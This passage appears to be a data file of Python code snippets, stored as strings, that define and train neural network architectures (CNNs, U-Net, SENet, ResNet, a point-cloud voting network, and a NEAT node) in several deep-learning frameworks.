tf.nn.dropout(layer_conv, keep_prob)\n #print(layer_conv)\n layer_conv = conv2d_maxpool(x, nconv2, (5,5), (2,2), (2,2), (2,2))\n layer_conv = tf.layers.batch_normalization (layer_conv, name='BatchNormalization2')\n # TODO: Apply a Flatten Layer\n # Function Definition from Above:\n # flatten(x_tensor)\n layer_flat = flatten(layer_conv)\n #layer_flat = tflearn.layers.normalization.batch_normalization (layer_flat, name='BatchNormalization')\n \n \n\n # TODO: Apply 1, 2, or 3 Fully Connected Layers\n # Play around with different number of outputs\n # Function Definition from Above:\n # fully_conn(x_tensor, num_outputs)\n #layer_fully_conn = fully_conn(x, nfullyconn)\n layer_fully_conn = fully_conn(layer_flat, nfullyconn)\n #print(\"Fully Connected Outputs: {}\".format(layer_fully_conn.shape[1]))\n #layer_fully_conn = fully_conn(layer_fully_conn, nconv)\n layer_fully_conn = tf.layers.batch_normalization (layer_fully_conn, name='BatchNormalization3')\n layer_flat = flatten(layer_fully_conn)\n layer_fully_conn = fully_conn(layer_flat, nfullyconn2)\n layer_fully_conn = tf.layers.batch_normalization (layer_fully_conn, name='BatchNormalization4')\n layer_flat = flatten(layer_fully_conn)\n layer_fully_conn = tf.nn.dropout(layer_fully_conn, keep_prob)\n #layer_fully_conn = tf.nn.dropout(layer_fully_conn, keep_prob)\n \n # TODO: Apply an Output Layer\n # Set this to the number of classes\n # Function Definition from Above:\n # output(x_tensor, num_outputs)\n layer_final = output(layer_fully_conn, 46)\n \n \n # TODO: return output\n return layer_final", "def network_modified(input):\n\n up6 = upsample_and_concat( conv5, conv4, 256, 512 , 'up_conv1' )\n conv6=slim.conv2d(up6, 256,[3,3], rate=1, activation_fn=lrelu,scope='g_conv6_1')\n conv6=slim.conv2d(conv6,256,[3,3], rate=1, activation_fn=lrelu,scope='g_conv6_2')\n\n up7 = upsample_and_concat( conv6, conv3, 128, 256 , 'up_conv2' )\n conv7=slim.conv2d(up7, 128,[3,3], rate=1, activation_fn=lrelu,scope='g_conv7_1')\n conv7=slim.conv2d(conv7,128,[3,3], rate=1, activation_fn=lrelu,scope='g_conv7_2')\n\n up8 = upsample_and_concat( conv7, conv2, 64, 128 , 'up_conv3')\n conv8=slim.conv2d(up8, 64,[3,3], rate=1, activation_fn=lrelu,scope='g_conv8_1')\n conv8=slim.conv2d(conv8,64,[3,3], rate=1, activation_fn=lrelu,scope='g_conv8_2')\n\n up9 = upsample_and_concat( conv8, conv1, 32, 64 , 'up_conv4')\n conv9=slim.conv2d(up9, 32,[3,3], rate=1, activation_fn=lrelu,scope='g_conv9_1')\n conv9=slim.conv2d(conv9,32,[3,3], rate=1, activation_fn=lrelu,scope='g_conv9_2')\n\n conv10=slim.conv2d(conv9,12,[1,1], rate=1, activation_fn=None, scope='g_conv10')\n out = tf.depth_to_space(conv10,2)\n return out", "def forward(self, inputs, end_points, mode=\"\"):\n batch_size = inputs['point_clouds'].shape[0]\n\n end_points = self.backbone_net1(inputs['point_clouds'], end_points)\n end_points = self.backbone_net2(inputs['point_clouds'], end_points, mode='net1')\n end_points = self.backbone_net3(inputs['point_clouds'], end_points, mode='net2')\n end_points = self.backbone_net4(inputs['point_clouds'], end_points, mode='net3')\n\n ### Extract feature here\n xyz = end_points['fp2_xyz']\n features1 = end_points['fp2_features']\n features2 = end_points['fp2_features'+'net1']\n features3 = end_points['fp2_features'+'net2']\n features4 = end_points['fp2_features'+'net3']\n end_points['seed_inds'] = end_points['fp2_inds']\n end_points['seed_xyz'] = xyz\n end_points['seed_features'] = features1\n \n ### Combine the feature here\n features_hd_discriptor = torch.cat((features1, features2, 
features3, features4), dim=1)\n features_hd_discriptor = F.relu(self.bn_agg1(self.conv_agg1(features_hd_discriptor)))\n features_hd_discriptor = F.relu(self.bn_agg2(self.conv_agg2(features_hd_discriptor)))\n\n end_points['hd_feature'] = features_hd_discriptor\n \n net_flag_z = F.relu(self.bn_flag_z1(self.conv_flag_z1(features_hd_discriptor)))\n net_flag_z = self.conv_flag_z2(net_flag_z)\n end_points[\"pred_flag_z\"] = net_flag_z\n\n net_flag_xy = F.relu(self.bn_flag_xy1(self.conv_flag_xy1(features_hd_discriptor)))\n net_flag_xy = self.conv_flag_xy2(net_flag_xy)\n end_points[\"pred_flag_xy\"] = net_flag_xy\n\n net_flag_line = F.relu(self.bn_flag_line1(self.conv_flag_line1(features_hd_discriptor)))\n net_flag_line = self.conv_flag_line2(net_flag_line)\n end_points[\"pred_flag_line\"] = net_flag_line\n\n proposal_xyz, proposal_features, center_offset, center_residual = self.vgen(xyz, features_hd_discriptor)\n proposal_features_norm = torch.norm(proposal_features, p=2, dim=1)\n proposal_features = proposal_features.div(proposal_features_norm.unsqueeze(1))\n end_points['vote_xyz'] = proposal_xyz\n end_points['vote_features'] = proposal_features\n \n voted_z, voted_z_feature, z_offset, z_residual = self.vgen_z(xyz, features_hd_discriptor)\n voted_z_feature_norm = torch.norm(voted_z_feature, p=2, dim=1)\n voted_z_feature = voted_z_feature.div(voted_z_feature_norm.unsqueeze(1))\n end_points['vote_z'] = voted_z\n end_points['vote_z_feature'] = voted_z_feature\n\n voted_xy, voted_xy_feature, xy_offset, xy_residual = self.vgen_xy(xyz, features_hd_discriptor)\n voted_xy_feature_norm = torch.norm(voted_xy_feature, p=2, dim=1)\n voted_xy_feature = voted_xy_feature.div(voted_xy_feature_norm.unsqueeze(1))\n end_points['vote_xy'] = voted_xy\n end_points['vote_xy_feature'] = voted_xy_feature\n\n voted_line, voted_line_feature, line_offset, line_residual = self.vgen_line(xyz, features_hd_discriptor)\n voted_line_feature_norm = torch.norm(voted_line_feature, p=2, dim=1)\n voted_line_feature = voted_line_feature.div(voted_line_feature_norm.unsqueeze(1))\n end_points['vote_line'] = voted_line\n end_points['vote_line_feature'] = voted_line_feature\n \n center_z, feature_z, end_points = self.pnet_z(voted_z, voted_z_feature, end_points, mode='_z')\n center_xy, feature_xy, end_points = self.pnet_xy(voted_xy, voted_xy_feature, end_points, mode='_xy')\n center_line, feature_line, end_points = self.pnet_line(voted_line, voted_line_feature, end_points, mode='_line')\n\n end_points = self.pnet_final(proposal_xyz, proposal_features, center_z, feature_z, center_xy, feature_xy, center_line, feature_line, end_points)\n return end_points", "def _make_conv_layers(self):\n conv = nn.Sequential(\n nn.Conv2d(in_channels=3, out_channels=64, kernel_size=7, stride=2, padding=1), # padding=3 so, output is 224.\n nn.LeakyReLU(0.1, inplace=True),\n nn.MaxPool2d(kernel_size=2, stride=2),\n\n nn.Conv2d(64, 192, 3, padding=1),\n nn.LeakyReLU(0.1, inplace=True),\n nn.MaxPool2d(2,2),\n\n nn.Conv2d(192, 128, 1, padding=1), ## kernel size = 1 이므로 padding = 0(defalut)\n nn.LeakyReLU(0.1, inplace=True),\n\n nn.Conv2d(128, 256, 3, padding=1),\n nn.LeakyReLU(0.1, inplace=True),\n\n nn.Conv2d(256, 256, 1, padding=1),\n nn.LeakyReLU(0.1, inplace=True),\n\n nn.Conv2d(256, 512, 3, padding=1), \n nn.LeakyReLU(0.1, inplace=True),\n nn.MaxPool2d(2,2),\n\n nn.Conv2d(512, 256, 1, padding=1),\n nn.LeakyReLU(0.1, inplace=True),\n\n nn.Conv2d(256, 512, 3, padding=1), \n nn.LeakyReLU(0.1, inplace=True),\n\n nn.Conv2d(512, 256, 1, padding=1),\n 
nn.LeakyReLU(0.1, inplace=True),\n\n nn.Conv2d(256, 512, 3, padding=1), \n nn.LeakyReLU(0.1, inplace=True),\n\n nn.Conv2d(512, 256, 1, padding=1),\n nn.LeakyReLU(0.1, inplace=True),\n nn.Conv2d(256, 512, 3, padding=1), \n nn.LeakyReLU(0.1, inplace=True),\n\n nn.Conv2d(512, 256, 1, padding=1),\n nn.LeakyReLU(0.1, inplace=True),\n nn.Conv2d(256, 512, 3, padding=1), \n nn.LeakyReLU(0.1, inplace=True),\n\n nn.Conv2d(512, 512, 1, padding=1),\n nn.LeakyReLU(0.1, inplace=True),\n nn.Conv2d(512, 1024, 3, padding=1), \n nn.LeakyReLU(0.1, inplace=True),\n nn.MaxPool2d(2,2),\n\n nn.Conv2d(1024, 512, 1, padding=1),\n nn.LeakyReLU(0.1, inplace=True),\n nn.Conv2d(512, 1024, 3, padding=1),\n nn.LeakyReLU(0.1, inplace=True),\n\n nn.Conv2d(1024, 512, 1, padding=1),\n nn.LeakyReLU(0.1, inplace=True),\n nn.Conv2d(512, 1024, 3, padding=1),\n nn.LeakyReLU(0.1, inplace=True)\n )\n return conv", "def train_conv_net(datasets,datasets_weights,\n U, U_Topical,\n img_w=300, \n filter_hs=[3,4,5],\n hidden_units=[100,2], \n dropout_rate=[0.5],\n shuffle_batch=True,\n n_epochs=25, \n batch_size=50, \n lr_decay = 0.95,\n conv_non_linear=\"relu\",\n use_valid_set=True,\n show_states=False,\n activations=[Iden],\n sqr_norm_lim=9,\n non_static=True): \n rng = np.random.RandomState(3435)\n img_h = len(datasets[0][0])-1 \n U_Topical.dtype = \"float32\"\n (num_topics,topic_dim) = U_Topical.shape\n word_w = img_w\n img_w = int(img_w + num_topics*topic_dim)\n filter_w = img_w \n feature_maps = hidden_units[0]\n filter_shapes = []\n pool_sizes = []\n for filter_h in filter_hs: \n filter_shapes.append((feature_maps, 1, filter_h, filter_w)) # 100 1 3 300\n pool_sizes.append((img_h-filter_h+1, img_w-filter_w+1)) # size of words samples one\n parameters = [(\"image shape\",img_h,img_w),(\"filter shape\",filter_shapes), (\"hidden_units\",hidden_units),\n (\"dropout\", dropout_rate), (\"batch_size\",batch_size),(\"non_static\", non_static),\n (\"learn_decay\",lr_decay), (\"conv_non_linear\", conv_non_linear), (\"non_static\", non_static)\n ,(\"sqr_norm_lim\",sqr_norm_lim),(\"shuffle_batch\",shuffle_batch)]\n #print parameters \n \n #define model architecture\n index = T.lscalar()\n x = T.matrix('x') \n y = T.ivector('y')\n x_topic = T.tensor3('x_topic')\n Words = theano.shared(value = U, name = \"Words\")\n Topics = theano.shared(value=U_Topical,name=\"Topics\")\n zero_vec_tensor = T.vector()\n zero_vec = np.zeros(word_w, dtype='float32')\n set_zero = theano.function([zero_vec_tensor], updates=[(Words, T.set_subtensor(Words[0,:], zero_vec_tensor))])\n layer0_input_words = Words[T.cast(x.flatten(),dtype=\"int32\")].reshape((x.shape[0],1,x.shape[1],Words.shape[1])) \n layer0_inputs_topics = []\n for i in range(num_topics):\n sin_topic = x_topic[:,:,i]\n Topic = Topics[i].reshape((1,Topics[i].shape[0]))\n weights = sin_topic.flatten()\n weights = weights.reshape((weights.shape[0],1))\n layer0_inputs_topics.append(T.dot(weights, Topic))\n layer0_input_topics = T.concatenate(layer0_inputs_topics,1)\n layer0_input_topics = layer0_input_topics.reshape((x_topic.shape[0],1,x_topic.shape[1],num_topics*topic_dim))\n layer0_input = T.concatenate([layer0_input_words,layer0_input_topics],3) \n conv_layers = []\n layer1_inputs = []\n for i in xrange(len(filter_hs)):\n filter_shape = filter_shapes[i]\n pool_size = pool_sizes[i]\n conv_layer = LeNetConvPoolLayer(rng, input=layer0_input,image_shape=(batch_size, 1, img_h, img_w),\n filter_shape=filter_shape, poolsize=pool_size, non_linear=conv_non_linear)\n layer1_input = conv_layer.output.flatten(2)\n 
conv_layers.append(conv_layer)\n layer1_inputs.append(layer1_input)\n layer1_input = T.concatenate(layer1_inputs,1)\n hidden_units[0] = feature_maps*len(filter_hs) \n classifier = MLPDropout(rng, input=layer1_input, layer_sizes=hidden_units, activations=activations, dropout_rates=dropout_rate)\n \n #define parameters of the model and update functions using adadelta\n params = classifier.params \n for conv_layer in conv_layers:\n params += conv_layer.params\n \n if non_static:\n #if word vectors are allowed to change, add them as model parameters\n params += [Words] #params are model parameters\n params += [Topics] #Topics embedding are adjusted\n cost = classifier.negative_log_likelihood(y) \n dropout_cost = classifier.dropout_negative_log_likelihood(y) \n grad_updates = sgd_updates_adadelta(params, dropout_cost, lr_decay, 1e-6, sqr_norm_lim)\n \n #shuffle dataset and assign to mini batches. if dataset size is not a multiple of mini batches, replicate \n #extra data (at random)\n np.random.seed(3435)\n if datasets[0].shape[0] % batch_size > 0:\n extra_data_num = batch_size - datasets[0].shape[0] % batch_size\n random_index = np.random.permutation(np.arange(datasets[0].shape[0])) \n random_index.astype('int32')\n train_set = datasets[0][random_index,:]\n train_set_weights = datasets_weights[0][random_index,:,:]\n extra_data = train_set[:extra_data_num]\n extra_data_weights = train_set_weights[:extra_data_num]\n new_data=np.append(datasets[0],extra_data,axis=0)\n new_data_weights = np.append(datasets_weights[0],extra_data_weights,axis = 0)\n else:\n new_data = datasets[0]\n new_data_weights = datasets_weights[0]\n random_index = np.random.permutation(np.arange(new_data.shape[0])) \n random_index.astype('int32')\n new_data = new_data[random_index]\n new_data_weights = new_data_weights[random_index]\n n_batches = new_data.shape[0]/batch_size\n n_train_batches = int(np.round(n_batches*0.9))\n \n test_set_x = np.asarray(datasets[1][:,:img_h] ,\"float32\")\n test_set_x_topic = np.asarray(datasets_weights[1][:,:img_h,:] ,\"float32\")\n test_set_y = np.asarray(datasets[1][:,-1],\"int32\")\n if use_valid_set:\n train_set = new_data[:n_train_batches*batch_size,:]\n train_set_weights = new_data_weights[:n_train_batches*batch_size,:,:]\n val_set = new_data[n_train_batches*batch_size:,:]\n val_set_weights = new_data_weights[n_train_batches*batch_size:,:,:] \n train_set_x, train_set_x_topic, train_set_y = shared_dataset((train_set[:,:img_h],train_set_weights,train_set[:,-1]))\n val_set_x, val_set_x_topic, val_set_y = shared_dataset((val_set[:,:img_h],val_set_weights,val_set[:,-1]))\n n_val_batches = n_batches - n_train_batches\n val_model = theano.function([index], classifier.errors(y),\n givens={\n x: val_set_x[index * batch_size: (index + 1) * batch_size],\n x_topic: val_set_x_topic[index * batch_size: (index + 1) * batch_size],\n y: val_set_y[index * batch_size: (index + 1) * batch_size]})\n else:\n train_set = new_data[:,:] \n train_set_x, train_set_x_topic, train_set_y = shared_dataset((train_set[:,:img_h],train_set_weights,train_set[:,-1])) \n \n #make theano functions to get train/val/test errors\n test_model = theano.function([index], classifier.errors(y),\n givens={\n x: train_set_x[index * batch_size: (index + 1) * batch_size],\n x_topic: train_set_x_topic[index * batch_size: (index + 1) * batch_size],\n y: train_set_y[index * batch_size: (index + 1) * batch_size]}) \n train_model = theano.function([index], cost, updates=grad_updates,\n givens={\n x: 
train_set_x[index*batch_size:(index+1)*batch_size],\n x_topic: train_set_x_topic[index * batch_size: (index + 1) * batch_size],\n y: train_set_y[index*batch_size:(index+1)*batch_size]}) \n test_pred_layers = []\n test_size = test_set_x.shape[0]\n \n \n\n test_layer0_input_words = Words[T.cast(x.flatten(),dtype=\"int32\")].reshape((test_size,1,img_h,Words.shape[1])) \n test_layer0_inputs_topics = []\n for i in range(num_topics):\n sin_topic = x_topic[:,:,i]\n Topic = Topics[i].reshape((1,Topics[i].shape[0]))\n weights = sin_topic.flatten()\n weights = weights.reshape((weights.shape[0],1))\n test_layer0_inputs_topics.append(T.dot(weights, Topic))\n test_layer0_input_topics = T.concatenate(test_layer0_inputs_topics,1)\n test_layer0_input_topics = test_layer0_input_topics.reshape((test_size,1,img_h,num_topics*topic_dim))\n test_layer0_input = T.concatenate([test_layer0_input_words,test_layer0_input_topics],3) \n\n\n\n for conv_layer in conv_layers:\n test_layer0_output = conv_layer.predict(test_layer0_input, test_size)\n test_pred_layers.append(test_layer0_output.flatten(2))\n test_layer1_input = T.concatenate(test_pred_layers, 1)\n test_y_pred = classifier.predict(test_layer1_input)\n\n test_error = T.mean(T.neq(test_y_pred, y))\n test_model_all = theano.function([x,x_topic,y], test_error) \n \n #start training over mini-batches\n print '... training'\n epoch = 0\n best_val_perf = 0\n val_perf = 0\n test_perf = 0 \n cost_epoch = 0 \n while (epoch < n_epochs): \n epoch = epoch + 1\n if shuffle_batch:\n for minibatch_index in np.random.permutation(range(n_train_batches)):\n cost_epoch = train_model(minibatch_index)\n set_zero(zero_vec)\n else:\n for minibatch_index in xrange(n_train_batches):\n cost_epoch = train_model(minibatch_index) \n set_zero(zero_vec)\n train_losses = [test_model(i) for i in xrange(n_train_batches)]\n train_perf = 1 - np.mean(train_losses)\n if use_valid_set:\n val_losses = [val_model(i) for i in xrange(n_val_batches)]\n val_perf = 1- np.mean(val_losses)\n\n if val_perf >= best_val_perf:\n params_conv = [] \n params_output = {}\n test_loss = test_model_all(test_set_x,test_set_x_topic, test_set_y) \n test_perf = 1- test_loss \n best_val_perf = val_perf \n for conv_layer in conv_layers:\n params_conv.append(conv_layer.get_params())\n params_output = classifier.get_params()\n word_vec = Words.get_value()\n Topic_vec = Topics.get_value()\n else :\n val_perf = 0 \n if show_states:\n print('epoch %i, train perf %f %%, val perf %f' % (epoch, train_perf * 100., val_perf*100.))\n \n if not use_valid_set:\n params_conv = [] \n params_output = {}\n test_loss = test_model_all(test_set_x,test_set_x_topic, test_set_y) \n test_perf = 1- test_loss \n \n for conv_layer in conv_layers:\n params_conv.append(conv_layer.get_params())\n params_output = classifier.get_params()\n word_vec = Words.get_value()\n Topic_vec = Topics.get_value() \n \n return test_perf, [params_conv, params_output, word_vec,Topic_vec]", "def setUp(self):\n # The short NSC used in this example\n self.net_nsc = [\n (1, 4, 0, 0, 0), # Layer 1: Identity(input)\n (2, 1, 3, 1, 0), # Layer 2: Convolution(Layer1)\n (3, 1, 3, 2, 0), # Layer 3: Convolution(Layer2)\n (4, 5, 0, 1, 3), # Layer 4: Convolution(Layer1)\n (5, 7, 0, 0, 0), # Layer 5: Convolution(Layer4)\n ]", "def forward(self, Xo):\n N = Xo.size()[0]\n # assert Xo.size() == (N, 3, 448, 448)\n X = self.features(Xo)\n # assert X.size() == (N, 128, 112, 112)\n Xp = nn.MaxPool2d(kernel_size=4, stride=4)(X)\n # Xp = F.adaptive_avg_pool2d(X, (1, 1))\n # assert Xp.size() == 
(N, 128, 28, 28)\n Xp = Xp.view(-1, 128*28*28 )\n # 3 way, get attention mask\n X1 = self.fc1(Xp)\n X2 = self.fc2(Xp)\n X3 = self.fc3(Xp)\n # X1 = F.relu(self.fc1_(Xp))\n # X2 = F.relu(self.fc2_(Xp))\n # X3 = F.relu(self.fc3_(Xp))\n # X1 = self.fc1(X1)\n # X2 = self.fc2(X2)\n # X3 = self.fc3(X3)\n # multiple mask elementwisely, get 3 attention part\n X1 = X1.unsqueeze(dim=2).unsqueeze(dim=3) * X\n X2 = X2.unsqueeze(dim=2).unsqueeze(dim=3) * X\n X3 = X3.unsqueeze(dim=2).unsqueeze(dim=3) * X\n #get the graduate w.r.t input image and multiple, then X1 become N*3*448*448\n X1=self.weightByGrad(X1,Xo)\n X2=self.weightByGrad(X2,Xo)\n X3=self.weightByGrad(X3,Xo)\n # use stn to crop, size become (N,3,96,96)\n # X1 = self.stn(X1, 0)\n # X2 = self.stn(X2, 1)\n # X3 = self.stn(X3, 2)\n #3 BCNN 3 size==(N,200)\n X1=self.BCNN_N(X1,self.bcnnConv_1,self.bfc1)\n X2=self.BCNN_N(X2,self.bcnnConv_2,self.bfc2)\n X3=self.BCNN_N(X3,self.bcnnConv_3,self.bfc3)\n #sum them up, for the predict max\n res=X1+X2+X3\n\n return res", "def __init__(self, block, layers, groups, reduction, dropout_p=0.2, in_channels=3,\n inplanes=128, input_3x3=True, downsample_kernel_size=3,\n downsample_padding=1, num_classes=1000):\n super(SENet, self).__init__()\n \n self.in_channels = in_channels\n self.inplanes = inplanes\n\n if input_3x3:\n layer0_modules = [\n ('conv1', nn.Conv2d(in_channels, 64, 3, stride=2, padding=1,\n bias=False)),\n ('bn1', nn.BatchNorm2d(64)),\n ('relu1', nn.ReLU(inplace=True)),\n ('conv2', nn.Conv2d(64, 64, 3, stride=1, padding=1,\n bias=False)),\n ('bn2', nn.BatchNorm2d(64)),\n ('relu2', nn.ReLU(inplace=True)),\n ('conv3', nn.Conv2d(64, inplanes, 3, stride=1, padding=1,\n bias=False)),\n ('bn3', nn.BatchNorm2d(inplanes)),\n ('relu3', nn.ReLU(inplace=True)),\n ]\n else:\n layer0_modules = [\n ('conv1', nn.Conv2d(in_channels, inplanes, kernel_size=7, stride=2,\n padding=3, bias=False)),\n ('bn1', nn.BatchNorm2d(inplanes)),\n ('relu1', nn.ReLU(inplace=True)),\n ]\n\n layer0_modules.append(('pool', nn.MaxPool2d(3, stride=2, ceil_mode=True)))\n \n self.layer0 = nn.Sequential(OrderedDict(layer0_modules))\n \n self.layer1 = self._make_layer(\n block,\n planes=64,\n blocks=layers[0],\n groups=groups,\n reduction=reduction,\n downsample_kernel_size=1,\n downsample_padding=0\n )\n \n self.layer2 = self._make_layer(\n block,\n planes=128,\n blocks=layers[1],\n stride=2,\n groups=groups,\n reduction=reduction,\n downsample_kernel_size=downsample_kernel_size,\n downsample_padding=downsample_padding\n )\n \n self.layer3 = self._make_layer(\n block,\n planes=256,\n blocks=layers[2],\n stride=2,\n groups=groups,\n reduction=reduction,\n downsample_kernel_size=downsample_kernel_size,\n downsample_padding=downsample_padding\n )\n \n self.layer4 = self._make_layer(\n block,\n planes=512,\n blocks=layers[3],\n stride=2,\n groups=groups,\n reduction=reduction,\n downsample_kernel_size=downsample_kernel_size,\n downsample_padding=downsample_padding\n )\n \n self.avg_pool = nn.AvgPool2d(7, stride=1)\n self.dropout = nn.Dropout2d(dropout_p) if dropout_p is not None else None\n self.last_linear = nn.Linear(512 * block.expansion, num_classes)", "def ternausnetv1(input_shape=(512, 512, 3), base_depth=64):\n inputs = Input(input_shape)\n conv1 = Conv2D(base_depth, 3, activation='relu', padding='same')(inputs)\n pool1 = MaxPooling2D(pool_size=(2, 2))(conv1)\n\n conv2_1 = Conv2D(base_depth*2, 3, activation='relu',\n padding='same')(pool1)\n pool2 = MaxPooling2D(pool_size=(2, 2))(conv2_1)\n\n conv3_1 = Conv2D(base_depth*4, 3, 
activation='relu',\n padding='same')(pool2)\n conv3_2 = Conv2D(base_depth*4, 3, activation='relu',\n padding='same')(conv3_1)\n pool3 = MaxPooling2D(pool_size=(2, 2))(conv3_2)\n\n conv4_1 = Conv2D(base_depth*8, 3, activation='relu',\n padding='same')(pool3)\n conv4_2 = Conv2D(base_depth*8, 3, activation='relu',\n padding='same')(conv4_1)\n pool4 = MaxPooling2D(pool_size=(2, 2))(conv4_2)\n\n conv5_1 = Conv2D(base_depth*8, 3, activation='relu',\n padding='same')(pool4)\n conv5_2 = Conv2D(base_depth*8, 3, activation='relu',\n padding='same')(conv5_1)\n pool5 = MaxPooling2D(pool_size=(2, 2))(conv5_2)\n\n conv6_1 = Conv2D(base_depth*8, 3, activation='relu',\n padding='same')(pool5)\n\n up7 = Conv2DTranspose(base_depth*4, 2, strides=(2, 2), activation='relu',\n padding='same')(conv6_1)\n concat7 = concatenate([up7, conv5_2])\n conv7_1 = Conv2D(base_depth*8, 3, activation='relu',\n padding='same')(concat7)\n\n up8 = Conv2DTranspose(base_depth*4, 2, strides=(2, 2), activation='relu',\n padding='same')(conv7_1)\n concat8 = concatenate([up8, conv4_2])\n conv8_1 = Conv2D(base_depth*8, 3, activation='relu',\n padding='same')(concat8)\n\n up9 = Conv2DTranspose(base_depth*2, 2, strides=(2, 2), activation='relu',\n padding='same')(conv8_1)\n concat9 = concatenate([up9, conv3_2])\n conv9_1 = Conv2D(base_depth*4, 3, activation='relu',\n padding='same')(concat9)\n\n up10 = Conv2DTranspose(base_depth, 2, strides=(2, 2), activation='relu',\n padding='same')(conv9_1)\n concat10 = concatenate([up10, conv2_1])\n conv10_1 = Conv2D(base_depth*2, 3, activation='relu',\n padding='same')(concat10)\n\n up11 = Conv2DTranspose(int(base_depth/2), 2, strides=(2, 2),\n activation='relu', padding='same')(conv10_1)\n concat11 = concatenate([up11, conv1])\n\n out = Conv2D(1, 1, activation='sigmoid', padding='same')(concat11)\n\n return Model(input=inputs, output=out)", "def build_network(self):\n\n input_placeholder = Input(shape = self.input_shape)\n\n # Stage 1\n x = self.main_path_block(\n input_placeholder,\n 64, (7, 7), 'same',\n 'conv1', 'bn_conv1',\n activation = 'relu',\n strides = (2, 2)\n )\n x = MaxPooling2D((3, 3), strides = (2, 2), padding = 'same')(x)\n\n # Stage 2\n x = self.identity_block(x, 64, 'relu', 2, 'a', False)\n x = self.identity_block(x, 64, 'relu', 2, 'b')\n\n # Stage 3\n x = self.convolutional_block(x, [128, 128, 128], 'relu', 3, 'a')\n x = self.identity_block(x, 128, 'relu', 3, 'b')\n\n # Stage 4\n x = self.convolutional_block(x, [256, 256, 256], 'relu', 4, 'a')\n x = self.identity_block(x, 256, 'relu', 4, 'b')\n\n # Stage 5\n x = self.convolutional_block(x, [512, 512, 512], 'relu', 5, 'a')\n x = self.identity_block(x, 512, 'relu', 4, 'b')\n\n # Fully Connected Layers\n x = BatchNormalization(axis = 3)(x)\n x = Activation('relu')(x)\n x = AveragePooling2D((2, 1), padding = 'valid', strides = (2, 2))(x)\n x = Flatten()(x)\n x = Dense(512)\n x = Dense(\n self.classes, activation = 'softmax',\n name = 'fc_' + str(self.classes),\n kernel_initializer = glorot_uniform(seed = 0)\n )(x)\n\n self.model = Model(input_placeholder, x, name = 'Resnet18')", "def _model_definition(self, net):\n \n # Input filtering and downsampling with max pooling\n print(net.shape) #channels must be specified first otherwise keras assumes channels last\n print('resnet17_scp')\n \n net = Conv2D( filters=128, kernel_size=5, activation=None, padding='same', \n data_format=\"channels_first\", input_shape=(1, 100, 100))(net)\n net = BatchNormalization(axis=1)(net) #axis is set to the dimension which hold the colour channels\n net = 
LeakyReLU()(net)\n net= MaxPooling2D(pool_size=(2,2))(net)\n \n net = Conv2D( filters=64, kernel_size=3, activation=None, padding='same', data_format=\"channels_first\")(net)\n net = BatchNormalization(axis=1)(net) #axis is set to the dimension which hold the colour channels\n net = LeakyReLU()(net)\n net= MaxPooling2D(pool_size=(2,2))(net)\n \n net = Conv2D( filters=64, kernel_size=3,activation=None, padding='same', data_format=\"channels_first\")(net)\n net = BatchNormalization(axis=1)(net) #axis is set to the dimension which hold the colour channels \n net = LeakyReLU()(net)\n net= MaxPooling2D(pool_size=(2,2))(net)\n \n\n\n \n return net", "def __init__(self):\n super(FcNet, self).__init__()\n\n # get size of some layers\n start_num = 48\n max_num = 200\n mid_num = 50\n end_num = 8\n \n # define regressor\n self.regress = nn.Sequential(\n nn.Linear(start_num,max_num,bias=True),\n nn.Sigmoid(),\n nn.Linear(max_num,mid_num,bias = True),\n nn.Sigmoid(),\n nn.Linear(mid_num,end_num, bias = True),\n nn.Sigmoid()\n )", "def __init__(self, id, node_type=NodeType.HIDDEN, activation=F.relu, layer_type=nn.Conv2d,\n conv_window_size=3, conv_stride=1, max_pool_size=2):\n\n super(ModuleNEATNode, self).__init__(id, node_type)\n\n batch_norm_chance = 0.65 # chance that a new node will start with batch norm\n use_batch_norm = random.random() < batch_norm_chance\n\n dropout_chance = 0.2 # chance that a new node will start with drop out\n use_dropout = random.random() < dropout_chance\n\n max_pool_chance = 0.3 # chance that a new node will start with drop out\n use_max_pool = random.random() < max_pool_chance\n\n self.activation = Mutagen(F.relu, F.leaky_relu, torch.sigmoid, F.relu6,\n discreet_value=activation, name=\"activation function\",\n mutation_chance=0.15) # TODO try add in Selu, Elu\n\n conv_out_features = 25 + random.randint(0, 25)\n linear_out_features = 100 + random.randint(0, 100)\n\n linear_submutagens = \\\n {\n \"regularisation\": Mutagen(None, nn.BatchNorm1d,\n discreet_value=nn.BatchNorm1d if use_batch_norm else None,\n mutation_chance=0.15),\n\n \"dropout\": Mutagen(None, nn.Dropout, discreet_value=nn.Dropout if use_dropout else None, sub_mutagens=\n {\n nn.Dropout: {\n \"dropout_factor\": Mutagen(value_type=ValueType.CONTINUOUS, current_value=0.15, start_range=0,\n end_range=0.75)}\n }, mutation_chance=0.08),\n\n \"out_features\": Mutagen(value_type=ValueType.WHOLE_NUMBERS, current_value=linear_out_features,\n start_range=10,\n end_range=1024, name=\"num out features\", mutation_chance=0.22,\n distance_weighting=Props.LAYER_SIZE_COEFFICIENT if Config.allow_attribute_distance else 0)\n }\n\n conv_submutagens = {\n \"conv_window_size\": Mutagen(3, 5, 7, discreet_value=conv_window_size, mutation_chance=0.13),\n\n \"conv_stride\": Mutagen(value_type=ValueType.WHOLE_NUMBERS, current_value=conv_stride, start_range=1,\n end_range=5),\n\n \"reduction\": Mutagen(None, nn.MaxPool2d, discreet_value=nn.MaxPool2d if use_max_pool else None,\n sub_mutagens=\n {\n nn.MaxPool2d: {\"pool_size\": Mutagen(\n value_type=ValueType.WHOLE_NUMBERS, current_value=max_pool_size, start_range=2,\n end_range=5)}\n }, mutation_chance=0.15),\n\n \"regularisation\": Mutagen(None, nn.BatchNorm2d, discreet_value=nn.BatchNorm2d if use_batch_norm else None,\n mutation_chance=0.15),\n\n \"dropout\": Mutagen(None, nn.Dropout2d, discreet_value=nn.Dropout2d if use_dropout else None, sub_mutagens=\n {\n nn.Dropout2d: {\n \"dropout_factor\": Mutagen(value_type=ValueType.CONTINUOUS, current_value=0.1,\n start_range=0, 
